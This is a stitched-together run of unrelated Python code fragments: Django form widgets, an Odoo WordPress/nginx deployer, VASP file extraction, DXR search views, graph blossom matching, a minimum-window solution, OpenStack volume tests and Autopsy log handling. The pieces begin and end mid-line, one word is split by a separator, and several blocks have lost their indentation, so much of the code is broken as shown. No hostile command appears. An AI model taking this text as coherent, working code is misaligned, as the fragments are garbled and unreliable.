                return new_widget
cl | ass ChoiceFieldMixin(field_mixins.ChoiceFieldMixin):
def get_converted_widget(self):
assert(isinstance(self, fields.ChoiceField))
if isinstance(self.widget, widgets.RadioSelect):
self.widget_css_classes = None
| if not isinstance(self.widget, bs3widgets.RadioSelect):
new_widget = bs3widgets.RadioSelect()
new_widget.__dict__ = self.widget.__dict__
return new_widget
class MultipleChoiceFieldMixin(field_mixins.MultipleChoiceFieldMixin):
    """Convert a MultipleChoiceField's CheckboxSelectMultiple into the bs3 one."""

    def get_converted_widget(self):
        """Return a bs3 CheckboxSelectMultiple clone of the widget, or None."""
        assert isinstance(self, fields.MultipleChoiceField)
        if not isinstance(self.widget, widgets.CheckboxSelectMultiple):
            return None
        self.widget_css_classes = None
        if isinstance(self.widget, bs3widgets.CheckboxSelectMultiple):
            return None
        converted = bs3widgets.CheckboxSelectMultiple()
        # Carry over the original widget's full state.
        converted.__dict__ = self.widget.__dict__
        return converted
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron
# Copyright 2015, TODAY Clouder SASU
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License with Attribution
# clause as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License with
# Attribution clause along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
##############################################################################
from odoo import models, api, modules
class ClouderContainer(models.Model):
    """
    Add methods to manage the wordpress specificities.
    """

    _inherit = 'clouder.service'

    @api.multi
    def deploy_post(self):
        """After the base deployment, download and unpack the latest
        Wordpress release into /var/www for wordpress-type applications."""
        super(ClouderContainer, self).deploy_post()
        if self.application_id.type_id.name == 'wordpress':
            # NOTE(review): 'latest.tar.gz' is a second positional argument
            # to wget -- looks like it was meant to be '-O latest.tar.gz';
            # confirm against how execute() assembles the command.
            self.execute([
                'wget', '-q', 'https://wordpress.org/latest.tar.gz',
                'latest.tar.gz'], path='/var/www/', username='www-data')
            self.execute(['tar', '-xzf', 'latest.tar.gz'],
                         path='/var/www', username='www-data')
            # NOTE(review): './*.tar.gz' relies on shell glob expansion;
            # verify execute() runs commands through a shell.
            self.execute(['rm', '-rf', './*.tar.gz'],
                         path='/var/www', username='www-data')
class ClouderBase(models.Model):
    """
    Add methods to manage the wordpress nginx configuration.
    """

    _inherit = 'clouder.base'

    @api.multi
    def deploy_build(self):
        """
        Configure nginx: install the site template, substitute the base
        name and domain, enable the site and reload nginx.
        """
        res = super(ClouderBase, self).deploy_build()
        if self.application_id.type_id.name == 'wordpress':
            config_file = '/etc/nginx/sites-available/' + self.fullname
            # Push the bundled nginx template onto the service host.
            self.service_id.send(
                modules.get_module_path('clouder_template_wordpress') +
                '/res/nginx.config', config_file)
            # Substitute the BASE/DOMAIN placeholders in the template.
            self.service_id.execute([
                'sed', '-i', '"s/BASE/' + self.name + '/g"', config_file])
            self.service_id.execute([
                'sed', '-i', '"s/DOMAIN/' + self.domain_id.name + '/g"',
                config_file])
            # Enable the site and reload nginx to pick it up.
            self.service_id.execute([
                'ln', '-s', '/etc/nginx/sites-available/' + self.fullname,
                '/etc/nginx/sites-enabled/' + self.fullname])
            self.service_id.execute(['/etc/init.d/nginx', 'reload'])
        return res

    @api.multi
    def purge_post(self):
        """
        Purge from nginx configuration: drop both the enabled and the
        available site entries, then reload nginx.
        """
        super(ClouderBase, self).purge_post()
        if self.application_id.type_id.name == 'wordpress':
            self.service_id.execute([
                'rm', '-rf', '/etc/nginx/sites-enabled/' + self.fullname])
            self.service_id.execute([
                'rm', '-rf', '/etc/nginx/sites-available/' + self.fullname])
            self.service_id.execute(['/etc/init.d/nginx', 'reload'])
|
# Current zoo roster; index 2 holds the sloth, index 3 the tiger.
zoo_animals = ["pangolin", "cassowary", "sloth", "tiger"]
# Last night our zoo's sloth brutally attacked the poor tiger and ate it
# whole.  The ferocious sloth has been replaced by a friendly hyena, and
# the tiger's slot is filled in the same step.
zoo_animals[2:4] = ["hyena", "teta"]
|
"""
Classes::
VASPData -- A collection of functions that wrap bash code to extract
data from VASP output into managable .dat (.txt) files.
"""
import numpy as np
from subprocess import call, check_output
from ast import literal_eval
class VASPData(object):
    """
    A collection of functions that wrap bash code to extract
    data from VASP output into managable .dat (.txt) files.

    Variables::

    name -- A string containing the path to the VASP data.

    Functions::

    extract_symops_trans -- Get symmetry operations and translations
        from OUTCAR -> symops_trans.dat.
    extract_kpts_eigenvals -- Get k-points, weights, and eigenvalues
        from EIGENVAL -> kpts_eigenvals.dat.
    extract_kmax -- Get kmax from KPOINTS -> kmax.dat (details about
        what kmax is are given in readdata.py).
    """
    def __init__(self, name_of_data_directory, kpts_eigenvals=True,
                 symops_trans=True, kmax=True):
        """
        Arguments::

        name_of_data_directory -- See Variables::name.

        Keyword Arguments::

        kpts_eigenvals, symops_trans, kmax -- All are booleans that
            specify if that bit of data should be extracted from the
            VASP output files. One may use False if the corresponding
            .dat file already exists or is handmade. Default is True for
            all three.
        """
        self.name = name_of_data_directory
        if kpts_eigenvals:
            self.extract_kpts_eigenvals()
        if symops_trans:
            self.extract_symops_trans()
        if kmax:
            self.extract_kmax()

    def extract_symops_trans(self):
        """
        Use some bash code to look inside OUTCAR, grab the
        symmetry operators and translations, and then write them to a
        file called symops_trans.dat. File is written to the same folder
        the OUTCAR is in.
        """
        name = self.name
        # grep each 'isymop' block plus the 4 lines after it (the operator
        # rows and translation), keep columns 11-50, append a blank line.
        call("grep -A 4 -E 'isymop' " + name + "/OUTCAR | cut -c 11-50 > " +
             name + "/symops_trans.dat; echo '' >> " + name +
             "/symops_trans.dat", shell=True)

    def extract_kpts_eigenvals(self):
        """
        Use some bash code to look inside EIGENVAL and grab the
        k-points, weights, and eigenvalues associated with each band at
        each k-point. Write them to a file called kpts_eigenvals.dat.
        File is written to the same folder the EIGENVAL is in.
        """
        name = self.name
        # Count the file's lines; the first 7 are header, so tail the rest.
        # NOTE(review): check_output returns bytes on Python 3 -- .split()
        # still works there, but confirm the intended Python version.
        length = check_output('less ' + name + '/EIGENVAL | wc -l', shell=True)
        num = str([int(s) for s in length.split() if s.isdigit()][0] - 7)
        call('tail -n' + num + ' ' + name +
             '/EIGENVAL | cut -c 1-60 > ' + name + '/kpts_eigenvals.dat',
             shell=True)

    def extract_kmax(self):
        """
        Look inside KPOINTS and grab the number of kpoints used in
        one direction. If the grid is not cubic i.e. 12 12 5 it will
        take the smallest. Also assumes the KPOINTS has this format:

        nxmxp! comment line
        0
        Monkhorst
        12 12 12
        0 0 0

        at least as far as what line the 12 12 12 is on. To be concrete
        the only requirement is that the grid is specified on
        the fourth line. If one wishes to use a different format for the
        KPOINTS file they can set the kmax bool to False and generate
        their own kmax.dat in the same directory as the VASP data to be
        used by readdata.py. GRID SIZE ON FOURTH LINE.
        """
        name = self.name
        with open(name+'/KPOINTS', 'r') as inf:
            # Fourth line holds the grid; take the smallest dimension.
            line = [literal_eval(x) for x in
                    inf.readlines()[3].strip().split()]
        k = min(line)
        kmax = np.ceil(k/(2*np.sqrt(3)))
        with open(name+'/kmax.dat', 'w') as outf:
            outf.write(str(kmax))
|
# Normalize querystring params:
config = current_app.dxr_config
frozen = frozen_config(tree)
req = request.values
query_text = req.get('q', '')
offset = non_negative_int(req.get('offset'), 0)
limit = min(non_negative_int(req.get('limit'), 100), 1000)
is_case_sensitive = req.get('case') == 'true'
# Make a Query:
query = Query(partial(current_app.es.search,
index=frozen['es_alias']),
query_text,
plugins_named(frozen['enabled_plugins']),
is_case_sensitive=is_case_sensitive)
# Fire off one of the two search routines:
searcher = _search_json if _request_wants_json() else _search_html
return searcher(query, tree, query_text, is_case_sensitive, offset, limit, config)
def _search_json(query, tree, query_text, is_case_sensitive, offset, limit, config):
    """Try a "direct search" (for exact identifier matches, etc.). If we have a direct hit,
    then return {redirect: hit location}. If that doesn't work, fall back to a normal search
    and return the results as JSON."""
    # If we're asked to redirect and have a direct hit, then return the url to that.
    if request.values.get('redirect') == 'true':
        result = query.direct_result()
        if result:
            path, line = result
            # TODO: Does this escape query_text properly?
            params = {
                'tree': tree,
                'path': path,
                'from': query_text
            }
            if is_case_sensitive:
                params['case'] = 'true'
            return jsonify({'redirect': url_for('.browse', _anchor=line, **params)})
    try:
        count_and_results = query.results(offset, limit)
        # Convert to dicts for ease of manipulation in JS:
        results = [{'icon': icon,
                    'path': path,
                    'lines': [{'line_number': nb, 'line': l} for nb, l in lines],
                    'is_binary': is_binary}
                   for icon, path, lines, is_binary in count_and_results['results']]
    except BadTerm as exc:
        # A malformed search term: report it to the client as a warning.
        return jsonify({'error_html': exc.reason, 'error_level': 'warning'}), 400
    return jsonify({
        'www_root': config.www_root,
        'tree': tree,
        'results': results,
        'result_count': count_and_results['result_count'],
        'result_count_formatted': format_number(count_and_results['result_count']),
        'tree_tuples': _tree_tuples(query_text, is_case_sensitive)})
def _search_html(query, tree, query_text, is_case_sensitive, offset, limit, config):
    """Return the rendered template for search.html.

    The actual search results are fetched asynchronously by the page's JS
    (note that *query*, *offset* and *limit* are not consumed here); this
    only renders the page chrome and the parameters it needs.
    """
    frozen = frozen_config(tree)
    # Try a normal search:
    template_vars = {
        'filters': filter_menu_items(
            plugins_named(frozen['enabled_plugins'])),
        'generated_date': frozen['generated_date'],
        'google_analytics_key': config.google_analytics_key,
        'is_case_sensitive': is_case_sensitive,
        'query': query_text,
        'search_url': url_for('.search',
                              tree=tree,
                              q=query_text,
                              redirect='false'),
        'top_of_tree': url_for('.browse', tree=tree),
        'tree': tree,
        'tree_tuples': _tree_tuples(query_text, is_case_sensitive),
        'www_root': config.www_root}
    return render_template('search.html', **template_vars)
def _tree_tuples(query_text, is_case_sensitive):
    """Return a list of rendering info for Switch Tree menu items."""
    case_params = {'case': 'true'} if is_case_sensitive else {}
    tuples = []
    for cfg in frozen_configs():
        search_link = url_for('.search',
                              tree=cfg['name'],
                              q=query_text,
                              **case_params)
        tuples.append((cfg['name'], search_link, cfg['description']))
    return tuples
@dxr_blueprint.route('/<tree>/raw/<path:path>')
def raw(tree, path):
    """Send raw data at path from tree, for binary things like images."""
    # Exact-match the stored path in ES.
    query = {
        'filter': {
            'term': {
                'path': path
            }
        }
    }
    results = current_app.es.search(
        query,
        index=es_alias_or_not_found(tree),
        doc_type=FILE,
        size=1)
    try:
        # we explicitly get index 0 because there should be exactly 1 result
        data = results['hits']['hits'][0]['_source']['raw_data'][0]
    except IndexError:  # couldn't find the image
        raise NotFound
    # NOTE(review): str.decode('base64') is Python 2 only; under Python 3
    # this would need base64.b64decode -- confirm the target interpreter.
    data_file = StringIO(data.decode('base64'))
    return send_file(data_file, mimetype=guess_type(path)[0])
@dxr_blueprint.route('/<tree>/source/')
@dxr_blueprint.route('/<tree>/source/<path:path>')
def browse(tree, path=''):
    """Show a directory listing or a single file from one of the trees.

    Raise NotFound if path does not exist as either a folder or file.
    """
    config = current_app.dxr_config
    try:
        # Strip any trailing slash because we do not store it in ES.
        return _browse_folder(tree, path.rstrip('/'), config)
    except NotFound:
        # Not a folder: fall through and treat the path as a file.
        frozen = frozen_config(tree)
        # Grab the FILE doc, just for the sidebar nav links and the symlink target:
        files = filtered_query(
            frozen['es_alias'],
            FILE,
            filter={'path': path},
            size=1,
            include=['link', 'links'])
        if not files:
            raise NotFound
        if 'link' in files[0]:
            # Then this path is a symlink, so redirect to the real thing.
            return redirect(url_for('.browse', tree=tree, path=files[0]['link'][0]))
        lines = filtered_query(
            frozen['es_alias'],
            LINE,
            filter={'path': path},
            sort=['number'],
            size=1000000,
            include=['content', 'refs', 'regions', 'annotations'])
        # Deref the content field in each document. We can do this because we
        # do not store empty lines in ES.
        for doc in lines:
            doc['content'] = doc['content'][0]
        return _browse_file(tree, path, lines, files[0], config, frozen['generated_date'])
def _browse_folder(tree, path, config):
    """Return a rendered folder listing for folder ``path``.

    Search for FILEs having folder == path. If any matches, render the folder
    listing. Otherwise, raise NotFound.
    """
    frozen = frozen_config(tree)
    # Folders first, then alphabetical by name; raw_data is large and unused.
    files_and_folders = filtered_query(
        frozen['es_alias'],
        FILE,
        filter={'folder': path},
        sort=[{'is_folder': 'desc'}, 'name'],
        size=10000,
        exclude=['raw_data'])
    if not files_and_folders:
        raise NotFound
    return render_template(
        'folder.html',
        # Common template variables:
        www_root=config.www_root,
        tree=tree,
        tree_tuples=[
            (t['name'],
             url_for('.parallel', tree=t['name'], path=path),
             t['description'])
            for t in frozen_configs()],
        generated_date=frozen['generated_date'],
        google_analytics_key=config.google_analytics_key,
        paths_and_names=_linked_pathname(path, tree),
        filters=filter_menu_items(
            plugins_named(frozen['enabled_plugins'])),
        # Autofocus only at the root of each tree:
        should_autofocus_query=path == '',
        # Folder template variables:
        name=basename(path) or tree,
        path=path,
        files_and_folders=[
            (_icon_class_name(f),
             f['name'],
             decode_es_datetime(f['modified']) if 'modified' in f else None,
             f.get('size'),
             url_for('.browse', tree=tree, path=f.get('link', f['path'])[0]),
             f.get('is_binary', [False])[0])
            for f in files_and_folders])
def skim_file(skimmers, num_lines):
"""Skim contents with all the skimmers, returning the things we need to
make a template. Compare to dxr.build.index_file
:arg skimmers: iterable of FileToSkim objects
:arg num_lines: the number of lines in the file being skimmed
"""
linkses, refses, regionses = [], [], []
annotations_by_line = [[ |
from django.views.generic.edit import CreateView, UpdateView
from .models import AuthoredMock, EditoredMock
from .forms import AuthoredModelFormMock, EditoredModelFormMock
class FormKwargsRequestMixin(object):
    """Mixin that injects the current request into the form kwargs."""

    def get_form_kwargs(self):
        # BUG FIX: was `super(EditoredMockUpdateView, self).get_form_kwargs(self)`,
        # which hard-coded an unrelated class into the super() call and passed
        # `self` to an already-bound method (TypeError at runtime).
        kwargs = super(FormKwargsRequestMixin, self).get_form_kwargs()
        kwargs['request'] = self.request
        return kwargs
class AuthoredMockCreateView(FormKwargsRequestMixin, CreateView):
    """CreateView mock wiring AuthoredMock to its model form."""
    model = AuthoredMock
    # NOTE(review): Django's CreateView reads `form_class`, not `form`;
    # confirm whether `form` here is intentional for these test mocks.
    form = AuthoredModelFormMock
class EditoredMockUpdateView(FormKwargsRequestMixin, UpdateView):
    # Update view for EditoredMock; the mixin adds ``request`` to form kwargs.
    model = EditoredMock
    # NOTE(review): Django's generic editing views read ``form_class``, not
    # ``form`` -- as written this attribute looks unused by UpdateView; confirm.
    form = EditoredModelFormMock
|
queue.append(b)
elif t == 2:
# b became a T-vertex/blossom; assign label S to its mate.
# (If b is a non-trivial blossom, its base is the only vertex
# with an external mate.)
base = blossombase[b]
assignLabel(mate[base], 1, base)
# Trace back from vertices v and w to discover either a new blossom
# or an augmenting path. Return the base vertex of the new blossom,
# or NoNode if an augmenting path was found.
    def scanBlossom(v, w):
        """Trace back from S-vertices ``v`` and ``w`` toward the roots of
        their alternating trees, looking for a common ancestor.

        Returns the base vertex of the new blossom if the two paths meet,
        or ``NoNode`` if they reach distinct roots (an augmenting path).

        Reads/writes the enclosing matching state: ``inblossom``, ``label``,
        ``labeledge``, ``blossombase`` and ``mate``.
        """
        # Trace back from v and w, placing breadcrumbs as we go.
        path = [ ]
        base = NoNode
        while v is not NoNode:
            # Look for a breadcrumb in v's blossom or put a new breadcrumb.
            # Bit 4 marks a breadcrumb: label 5 == S-label (1) + breadcrumb (4).
            b = inblossom[v]
            if label[b] & 4:
                # The other path already passed through b: common ancestor found.
                base = blossombase[b]
                break
            assert label[b] == 1
            path.append(b)
            label[b] = 5
            # Trace one step back.
            if labeledge[b] is None:
                # The base of blossom b is single; stop tracing this path.
                assert blossombase[b] not in mate
                v = NoNode
            else:
                assert labeledge[b][0] == mate[blossombase[b]]
                v = labeledge[b][0]
                b = inblossom[v]
                assert label[b] == 2
                # b is a T-blossom; trace one more step back.
                v = labeledge[b][0]
            # Swap v and w so that we alternate between both paths.
            if w is not NoNode:
                v, w = w, v
        # Remove breadcrumbs (restore plain S-labels).
        for b in path:
            label[b] = 1
        # Return base vertex, if we found one.
        return base
# Construct a new blossom with given base, through S-vertices v and w.
# Label the new blossom as S; set its dual variable to zero;
# relabel its T-vertices to S and add them to the queue.
    def addBlossom(base, v, w):
        """Construct a new blossom with the given ``base`` through the edge
        between S-vertices ``v`` and ``w``.

        Labels the new blossom S, sets its dual variable to zero, relabels
        its T-vertices to S (queueing them for scanning), and computes the
        blossom's least-slack edges to other S-blossoms (``mybestedges``).
        """
        bb = inblossom[base]
        bv = inblossom[v]
        bw = inblossom[w]
        # Create blossom.
        b = Blossom()
        blossombase[b] = base
        blossomparent[b] = None
        blossomparent[bb] = b
        # Make list of sub-blossoms and their interconnecting edge endpoints.
        b.childs = path = [ ]
        b.edges = edgs = [ (v, w) ]
        # Trace back from v to base.
        while bv != bb:
            # Add bv to the new blossom.
            blossomparent[bv] = b
            path.append(bv)
            edgs.append(labeledge[bv])
            assert label[bv] == 2 or (label[bv] == 1 and labeledge[bv][0] == mate[blossombase[bv]])
            # Trace one step back.
            v = labeledge[bv][0]
            bv = inblossom[v]
        # Add base sub-blossom; reverse lists so the path starts at the base.
        path.append(bb)
        path.reverse()
        edgs.reverse()
        # Trace back from w to base.
        while bw != bb:
            # Add bw to the new blossom.
            blossomparent[bw] = b
            path.append(bw)
            # Edge endpoints are swapped so every stored edge points
            # "forward" around the blossom cycle.
            edgs.append((labeledge[bw][1], labeledge[bw][0]))
            assert label[bw] == 2 or (label[bw] == 1 and labeledge[bw][0] == mate[blossombase[bw]])
            # Trace one step back.
            w = labeledge[bw][0]
            bw = inblossom[w]
        # Set label to S.
        assert label[bb] == 1
        label[b] = 1
        labeledge[b] = labeledge[bb]
        # Set dual variable to zero.
        blossomdual[b] = 0
        # Relabel vertices.
        for v in b.leaves():
            if label[inblossom[v]] == 2:
                # This T-vertex now turns into an S-vertex because it becomes
                # part of an S-blossom; add it to the queue.
                queue.append(v)
            inblossom[v] = b
        # Compute b.mybestedges: for every other S-blossom keep the
        # least-slack edge from this new blossom.
        bestedgeto = { }
        for bv in path:
            if isinstance(bv, Blossom):
                if bv.mybestedges is not None:
                    # Walk this subblossom's least-slack edges.
                    nblist = bv.mybestedges
                    # The sub-blossom won't need this data again.
                    bv.mybestedges = None
                else:
                    # This subblossom does not have a list of least-slack
                    # edges; get the information from the vertices.
                    nblist = [ (v, w)
                               for v in bv.leaves()
                               for w in G.neighbors(v)
                               if v != w ]
            else:
                nblist = [ (bv, w)
                           for w in G.neighbors(bv)
                           if bv != w ]
            for k in nblist:
                (i, j) = k
                # Orient each candidate edge so that i lies inside b.
                if inblossom[j] == b:
                    i, j = j, i
                bj = inblossom[j]
                if (bj != b and label.get(bj) == 1 and
                    ((bj not in bestedgeto) or
                     slack(i, j) < slack(*bestedgeto[bj]))):
                    bestedgeto[bj] = k
            # Forget about least-slack edge of the subblossom.
            bestedge[bv] = None
        b.mybestedges = list(bestedgeto.values())
        # Select bestedge[b]: the overall least-slack edge out of b.
        mybestedge = None
        bestedge[b] = None
        for k in b.mybestedges:
            kslack = slack(*k)
            if mybestedge is None or kslack < mybestslack:
                mybestedge = k
                mybestslack = kslack
        bestedge[b] = mybestedge
# Expand the given top-level blossom.
def expandBlossom(b, endstage):
# Convert sub-blossoms into top-level blossoms.
for s in b.childs:
blossomparent[s] = None
if isinstance(s, Blossom):
if endstage and blossomdual[s] == 0:
# Recursively expand this sub-blossom.
expandBlossom(s, endstage)
else:
for v in s.leaves():
inblossom[v] = s
else:
inblossom[s] = s
# If we expand a T-blossom during a stage, its sub-blossoms must be
# relabeled.
if (not endstage) and label.get(b) == 2:
# Start at the sub-blossom through which the expanding
# blossom obtained its label, and relabel sub-blossoms untili
# we reach the base.
# Figure out through which sub-blossom the expanding blossom
# obtained its label initially.
entrychild = inblossom[labeledge[b][1]]
# Decide in which direction we will go round the blossom.
j = b.childs.index(entrychild)
if j & 1:
# Start index is odd; go forward and wrap.
j -= len(b.childs)
jstep = 1
else:
# Start index is even; go backward.
jstep = -1
# Move along the blossom until we get to the base.
v, w = labeledge[b]
while j != 0:
# Relabel the T-sub-blossom.
if jstep == 1:
p, q = b.edges[j]
else:
q, p = b.edges[j-1]
label[w] = None
label[q] = None
assignLabel(w, 2, v)
# Step to the next S-sub-blossom and note its forward edge.
allowedge[(p, q)] = allowedge[(q, p)] = True
j += jstep
if jstep == 1:
v, w = b.edges[j]
else:
w, v = b.edges[j-1]
# Step to the next T-sub-blossom.
allowedge[(v, w)] = allowedge[(w, v)] = True
j += jstep
# Relabel the base T-sub-blossom WITHOUT stepping through to
# its mate (so don't call assignLabel).
bw = b.childs[j]
label[w] = label[bw] = 2
labeledge[w] = labeledge[bw] = (v, w)
bestedge[bw] = None
# Continue along the blossom until we get back to entrychild.
j += jstep
while b.childs[j] != entrychild:
# Examine the vertices of the sub-blossom to see whether
# |
from collections import defaultdict
class Solution(object):
    def minWindow(self, S, T):
        """Return the smallest window of S containing T as a subsequence.

        :type S: str
        :type T: str
        :rtype: str (empty string when no such window exists)
        """
        # preceding[ch] lists, in descending order, the slot indices p such
        # that T[p + 1] == ch. Slot k means "first k chars of T matched".
        preceding = defaultdict(list)
        for slot, ch in enumerate(T, -1):
            preceding[ch].append(slot)
        for slots in preceding.values():
            slots.reverse()

        # match_start[k] = start index in S of a subsequence match of T[:k].
        # The extra trailing slot (index -1) tracks the current scan position,
        # so slot p == -1 below reads the position being scanned.
        match_start = [None] * (len(T) + 1)
        best_lo, best_hi = float('-inf'), 0
        for pos, ch in enumerate(S):
            match_start[-1] = pos
            # Descending slot order prevents reusing this character twice.
            for p in preceding[ch]:
                if match_start[p] is not None:
                    match_start[p + 1] = match_start[p]
            if (ch == T[-1] and match_start[-2] is not None
                    and pos - match_start[-2] < best_hi - best_lo):
                best_lo, best_hi = match_start[-2], pos
        return '' if best_lo < 0 else S[best_lo:best_hi + 1]
# print(Solution().minWindow("abcdebdde", "bde"))
# print(Solution().minWindow("nkzcnhczmccqouqadqtmjjzltgdzthm", "bt"))
# Ad-hoc smoke test; expected output: "mccqouqadqtm".
print(Solution().minWindow("cnhczmccqouqadqtmjjzl", "mm"))
|
_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.volume_get(IsA(http.HttpRequest), snapshot.volume_id).\
AndReturn(self.cinder_volumes.first())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=snapshot.id,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get snapshot from url
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = reverse('horizon:project:volumes:index')
self.assertRedirectsNoFollow(res, redirect_url)
    @test.create_stubs({cinder: ('volume_create',
                                 'volume_get',
                                 'volume_list',
                                 'volume_type_list',
                                 'availability_zone_list',
                                 'volume_snapshot_get',
                                 'volume_snapshot_list',
                                 'extension_supported'),
                        api.glance: ('image_list_detailed',),
                        quotas: ('tenant_limit_usages',)})
    def test_create_volume_from_volume(self):
        """Creating a volume from another volume passes it as source_volid."""
        volume = self.cinder_volumes.first()
        usage_limit = {'maxTotalVolumeGigabytes': 250,
                       'gigabytesUsed': 20,
                       'volumesUsed': len(self.cinder_volumes.list()),
                       'maxTotalVolumes': 6}
        formData = {'name': u'A copy of a volume',
                    'description': u'This is a volume I am making for a test.',
                    'method': u'CreateForm',
                    'size': 50,
                    'type': '',
                    'volume_source_type': 'volume_source',
                    'volume_source': volume.id}
        # NOTE(review): mox expectations below -- keep the recording order in
        # sync with the order the view issues these calls; confirm before
        # reordering anything.
        cinder.volume_list(IsA(http.HttpRequest)).\
            AndReturn(self.cinder_volumes.list())
        cinder.volume_type_list(IsA(http.HttpRequest)).\
            AndReturn(self.volume_types.list())
        cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
            AndReturn(self.cinder_volume_snapshots.list())
        quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
            AndReturn(usage_limit)
        cinder.volume_get(IsA(http.HttpRequest),
                          volume.id).AndReturn(self.cinder_volumes.first())
        cinder.extension_supported(IsA(http.HttpRequest),
                                   'AvailabilityZones').AndReturn(True)
        cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
            self.cinder_availability_zones.list())
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'is_public': True,
                                                'status': 'active'}) \
            .AndReturn([self.images.list(), False])
        api.glance.image_list_detailed(IsA(http.HttpRequest),
                                       filters={'property-owner_id': self.tenant.id,
                                                'status': 'active'}) \
            .AndReturn([[], False])
        # The volume source must flow through source_volid; snapshot_id and
        # image_id stay None for this creation path.
        cinder.volume_create(IsA(http.HttpRequest),
                             formData['size'],
                             formData['name'],
                             formData['description'],
                             '',
                             metadata={},
                             snapshot_id=None,
                             image_id=None,
                             availability_zone=None,
                             source_volid=volume.id).AndReturn(volume)
        self.mox.ReplayAll()
        url = reverse('horizon:project:volumes:volumes:create')
        redirect_url = reverse('horizon:project:volumes:index')
        res = self.client.post(url, formData)
        self.assertNoFormErrors(res)
        self.assertMessageCount(info=1)
        self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_snapshot_get',
'volume_get',
'volume_list',
'volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
|
est_data.common_log_path, "w", "utf_8")
warning_log = codecs.open(test_data.warning_log, "w", "utf_8")
rep_path = make_local_path(test_data.main_config.output_dir)
rep_path = rep_path.replace("\\\\", "\\")
for file in os.listdir(logs_path):
log = codecs.open(make_path(logs_path, file), "r", "utf_8")
try:
for line in log:
line = line.replace(rep_path, "test_data")
if line.startswith("SEVERE"):
common_log.write(file +": " + line)
except UnicodeDecodeError as e:
pass
log.close()
common_log.write("\n")
common_log.close()
srtcmdlst = ["sort", test_data.common_log_path, "-o", test_data.common_log_path]
subprocess.call(srtcmdlst)
except (OSError, IOError) as e:
Errors.print_error("Error: Unable to generate the common log.")
Errors.print_error(str(e) + "\n")
Errors.print_error(traceback.format_exc())
logging.critical(traceback.format_exc())
def _fill_ingest_data(test_data):
    """Fill the TestDatas variables that require the log files.

    Args:
        test_data: the TestData to modify
    """
    try:
        # Open autopsy.log.0
        log_path = make_path(test_data.logs_dir, "autopsy.log.0")
        # "with" closes the handle deterministically (the original leaked it).
        with open(log_path) as log:
            # Set the TestData start time based off the first line of autopsy.log.0
            # *** If logging time format ever changes this will break ***
            test_data.start_date = log.readline().split(" org.")[0]
        # Set the test_data ending time based off the "create" time (when the file was copied)
        test_data.end_date = time.ctime(os.path.getmtime(log_path))
    except IOError as e:
        Errors.print_error("Error: Unable to open autopsy.log.0.")
        Errors.print_error(str(e) + "\n")
        logging.warning(traceback.format_exc())
    # Start date must look like: "2012-07-16 13:02:42.000"
    # End date must look like: "Mon Jul 16 13:02:42 2012"
    # *** If logging time format ever changes this will break ***
    start = datetime.datetime.strptime(test_data.start_date, "%Y-%m-%d %H:%M:%S.%f")
    end = datetime.datetime.strptime(test_data.end_date, "%a %b %d %H:%M:%S %Y")
    test_data.total_test_time = str(end - start)
    try:
        # Set Autopsy version, heap space, ingest time, and service times
        version_line = search_logs("INFO: Application name: Autopsy, version:", test_data)[0]
        test_data.autopsy_version = get_word_at(version_line, 5).rstrip(",")
        test_data.heap_space = search_logs("Heap memory usage:", test_data)[0].rstrip().split(": ")[1]
